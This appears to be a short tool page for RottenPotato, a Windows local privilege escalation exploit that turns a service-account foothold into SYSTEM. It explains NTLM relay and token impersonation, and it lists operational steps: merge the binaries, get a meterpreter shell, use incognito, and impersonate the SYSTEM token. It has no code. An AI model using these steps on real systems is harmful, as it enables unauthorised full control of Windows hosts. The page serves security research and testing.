RottenPotato local privilege escalation from service account to SYSTEM

RottenPotato – Local Privilege Escalation from Windows Service Accounts to SYSTEM

The idea behind this vulnerability is simple to describe at a high level:

1. Trick the “NT AUTHORITY\SYSTEM” account into authenticating via NTLM to a TCP endpoint we control.
2. Man-in-the-middle this authentication attempt (NTLM relay) to locally negotiate a security token for the “NT AUTHORITY\SYSTEM” account. This is done through a series of Windows API calls.
3. Impersonate the token we have just negotiated. This can only be done if the attackers current account has the privilege to impersonate security tokens. This is usually true of most service accounts and not true of most user-level accounts.

Usage:

1. Compile.
2. Use ILMerge to combine Potato.exe, SharpCifs.dll NHttp.dll, and Microsoft.VisualStudio.OLE.Interop.dll. This will produce a single, portable binary.
3. Get a meterpreter shell on the target system
4. use incognito
5. Run the binary from step.2
6. impersonate_token “NT AUTHORITY\SYSTEM”

Demo

Rotten Potato – MSSQL Privilege Escalation

Rotten Potato – IIS Privilege Escalation

Download

For a technical overview of this exploit see our blog post here.